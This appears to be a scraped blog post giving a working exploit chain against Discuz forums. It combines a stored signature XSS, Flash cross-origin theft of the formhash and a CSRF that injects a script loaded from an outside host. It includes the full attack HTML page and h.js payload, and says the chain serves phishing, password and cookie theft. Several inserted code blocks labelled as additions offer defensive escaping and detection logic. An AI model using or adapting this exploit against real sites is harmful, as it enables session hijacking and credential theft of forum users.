Discuz xss 0-day exploitation method

Source: Internet
Author: User
Tags: csrf attack

RAyh4c Black Box

Let's talk about the idea, and the specific code, behind exploiting the Discuz XSS from last year.

A persistent XSS vulnerability exists in the personal signature settings of all Discuz versions up to and including the X series: for example, when editing the personal signature, submitting </textarea><script>alert(1)</script> executes the script.
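The root cause is that the stored signature is echoed raw between the <textarea> tags of the settings page. The following added example (not code from the original post) renders that field the vulnerable way and the escaped way; the field name signaturenew comes from the post, the surrounding markup is a constructed stand-in.

```javascript
// Added example (not from the original post): the signature editor echoes the
// stored value between <textarea> tags. The field name signaturenew is taken
// from the post; the surrounding markup is a constructed stand-in.

function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Vulnerable rendering: raw value, so a "</textarea>" inside the value closes
// the element and whatever follows is parsed as page markup.
function renderSignatureFieldVulnerable(signature) {
  return '<textarea name="signaturenew">' + signature + "</textarea>";
}

// Hardened rendering: the closing tag and the script tag become literal text.
function renderSignatureFieldSafe(signature) {
  return '<textarea name="signaturenew">' + escapeHtml(signature) + "</textarea>";
}

// Count the closing textarea tags and script tags the HTML parser would see;
// a safe rendering always yields exactly one </textarea> and zero <script>.
function countActiveTags(html) {
  return {
    textareaClose: (html.match(/<\/textarea>/gi) || []).length,
    script: (html.match(/<script\b/gi) || []).length,
  };
}

// The payload quoted in the post.
const PAYLOAD = "</textarea><script>alert(1)</script>";
```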

The scenario for this XSS is unusual: it is triggered only on the personal profile settings page, so only you can see your own XSS.

In the past a self-XSS like this was nearly useless in a penetration test, but combined with other techniques it becomes valuable. The attack process:

The victim clicks a link in a post, which opens our attack web page and triggers the attack.

1. Use a Flash cross-origin request to obtain the victim's formhash and current personal signature.

Every Discuz installation ships a crossdomain.xml in its root directory that allows Flash from any website to request and read page content, so the formhash is easily obtained.

 

2. Construct an auto-submitting form inside an IFRAME and modify the personal signature to add the XSS code.

For the CSRF to succeed, the formhash is required to build a complete parameter submission.

 

3. The attack code takes effect: the victim's browser is reverse-hijacked and a script is injected into the post page to run our code. From there, phishing, password stealing, cookie theft, or anything else is possible.

 

 

4. Finally, the victim's signature is restored. Because the signature content is displayed in posts (where the script does not execute), the anomaly would be easy to notice, so the original signature must be put back.
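The inject-then-restore sequence in steps 2 and 4 leaves a distinctive trace on the server: a signature edit carrying textarea-breakout markup, followed seconds later by an edit that puts the previous value back. The following added detection logic (not from the original post) runs over constructed profile-update events; the event shape and the 30-second window are assumptions, only the field name signaturenew and the payload string come from the post.

```javascript
// Added example (not from the original post): detection logic for the chain
// above, run over constructed profile-update events. Event shape and window
// size are assumptions; adapt the field names to your own audit log.

const SUSPICIOUS_MARKUP = /<\/textarea|<script\b|javascript:/i;

// Constructed events: user id, unix time, edited field, old and new value.
const EVENTS = [
  { uid: 42, ts: 1000, field: "signaturenew", oldValue: "hello", newValue: "hello world" },
  { uid: 7,  ts: 2000, field: "signaturenew", oldValue: "my sig",
    newValue: "</textarea><script src=http://test.com/h.js></script>" },
  { uid: 7,  ts: 2004, field: "signaturenew",
    oldValue: "</textarea><script src=http://test.com/h.js></script>", newValue: "my sig" },
  { uid: 9,  ts: 5000, field: "signaturenew", oldValue: "a", newValue: "b" },
  { uid: 9,  ts: 9000, field: "signaturenew", oldValue: "b", newValue: "a" },
];

// Flag (1) a signature that carries textarea-breakout or script markup and
// (2) an edit reverted to the previous value within `windowSec`, which is the
// inject-then-restore pattern of steps 2 and 4 (1 s inject, 5 s restore).
function findSignatureAbuse(events, windowSec = 30) {
  const alerts = [];
  const sorted = [...events].sort((a, b) => a.ts - b.ts);
  const lastEdit = new Map(); // uid -> most recent signature edit seen
  for (const ev of sorted) {
    if (ev.field !== "signaturenew") continue;
    if (SUSPICIOUS_MARKUP.test(ev.newValue)) {
      alerts.push({ uid: ev.uid, ts: ev.ts, rule: "markup-in-signature" });
    }
    const prev = lastEdit.get(ev.uid);
    if (prev && ev.ts - prev.ts <= windowSec && ev.newValue === prev.oldValue) {
      alerts.push({ uid: ev.uid, ts: ev.ts, rule: "rapid-revert", delta: ev.ts - prev.ts });
    }
    lastEdit.set(ev.uid, ev);
  }
  return alerts;
}
```

Ordinary users do sometimes change their mind within half a minute, so the rapid-revert rule is best treated as a corroborating signal next to the markup rule rather than an alert on its own.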

 

Attack code:

The flXHR library makes Flash cross-origin access to web page content easy and lets it interact with JavaScript; it has other powerful features as well: http://www.flensed.com/code/releases/flXHR-1.0.5.zip

luoluo's jspayloadlib, written two years ago, is an XSS and CSRF attack library that is well suited to practical use: http://jspayloadlib.googlecode.com/svn/trunk/src/org/ph4nt0m/net/formSendData.js
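flXHR can only read a page if the target site's crossdomain.xml admits foreign Flash, which is the condition step 1 relies on. The following added audit (not code from the original post or either library) flags the policy grants that create that condition; both sample policies are constructed, and the element and attribute names are those of Adobe's policy-file format.

```javascript
// Added example (not from the original post): audit a site's crossdomain.xml
// for the grant that lets foreign Flash read authenticated pages. Both sample
// policies below are constructed; the element and attribute names are Adobe's.

const PERMISSIVE_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>`;

const RESTRICTED_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="static.example.com" secure="true" />
  <allow-access-from domain="*.cdn.example.com" />
</cross-domain-policy>`;

// Pull each allow-access-from element's domain and secure attribute.
function parseAllowedDomains(xml) {
  const entries = [];
  const elemRe = /<allow-access-from\b([^>]*)>/gi;
  let m;
  while ((m = elemRe.exec(xml)) !== null) {
    const attrs = m[1];
    const domain = (/\bdomain\s*=\s*"([^"]*)"/i.exec(attrs) || ["", ""])[1];
    const secure = !/\bsecure\s*=\s*"false"/i.test(attrs); // default is true
    entries.push({ domain, secure });
  }
  return entries;
}

// Findings a reviewer would raise. A bare "*" is what the chain above needs:
// any origin's Flash can fetch memcp.php with the victim's cookies and read
// the formhash and signature out of the response.
function auditCrossdomainPolicy(xml) {
  const findings = [];
  for (const e of parseAllowedDomains(xml)) {
    if (e.domain === "*") findings.push({ kind: "any-origin", domain: e.domain });
    else if (e.domain.startsWith("*.")) findings.push({ kind: "wildcard-subdomain", domain: e.domain });
    if (!e.secure) findings.push({ kind: "secure-false", domain: e.domain });
  }
  return { findings, permissive: findings.some(f => f.kind === "any-origin") };
}
```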

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<script language="javascript" type="text/javascript" src="flXHR.js"></script>
<script language="javascript" type="text/javascript" src="formSendData.js"></script>

<script language="javascript" type="text/javascript">
<!--
var crossdomain_xml = "http://xxx.qq.com/discuz/Discuz_7.2_SC_GBK/crossdomain.xml"; // crossdomain.xml address
var attack_url = "http://xxx.qq.com/discuz/Discuz_7.2_SC_GBK/memcp.php?action=profile&typeid=2"; // personal profile settings page address

// flXHR proxy: handleLoading receives readyState changes, handleError receives errors
var flproxy = new flensed.flXHR({ autoUpdatePlayer: true, instanceId: "myproxy1", xmlResponseText: false, onerror: handleError, onreadystatechange: handleLoading, loadPolicyURL: crossdomain_xml, noCacheHeader: false });

function doit() {
    flproxy.open("GET", attack_url);
    var request = "";
    flproxy.send(request);
}

function handleLoading(XHRobj) {
    if (XHRobj.readyState == 4) {
        // alert(XHRobj.responseText);
        var HTMLcode = XHRobj.responseText;
        var hash_start = HTMLcode.search(/formhash=/);
        var signature_re = /textarea.*?signaturemessage.*?>(.*)<\/textarea/.exec(HTMLcode); // capture the current personal signature
        var scode = RegExp.$1;

        if (hash_start > -1) {
            // formhash is 8 characters; the 8 characters after the 9-character string "formhash=" are the formhash
            var formhash = HTMLcode.substr(hash_start + 9, 8);
            // alert(formhash);

            // "<\/script>" keeps the HTML parser from closing this inline script block early
            formSendData("post", attack_url, {
                "formhash": formhash,
                "signaturenew": "</textarea><script src=http://test.com/h.js><\/script>",
                "editsubmit": "1"
            }, 1000); // add the browser hijacking code

            formSendData("post", attack_url, {
                "formhash": formhash,
                "signaturenew": scode,
                "editsubmit": "1"
            }, 5000); // CSRF delayed by five seconds restores the personal signature
        }
    }
}
function handleError(errObj) {}
-->
</script>
</head>
<body>

<input type="button" value="Click Me" onClick="doit();" />
</body>

</html>

PS:

Content of h.js

window.parent.opener.location = "javascript:alert('I had been hijacking your browser!');void(0)";

Many people asked how the script is reverse-injected into the post page. This was covered in an earlier article: http://secinn.appspot.com/pstzine/read?issue=3&articleid=5. Because the IFRAMEd profile settings page and the post page are same-origin, window.parent.opener can be used to inject JS across frames back into the same-origin post page.
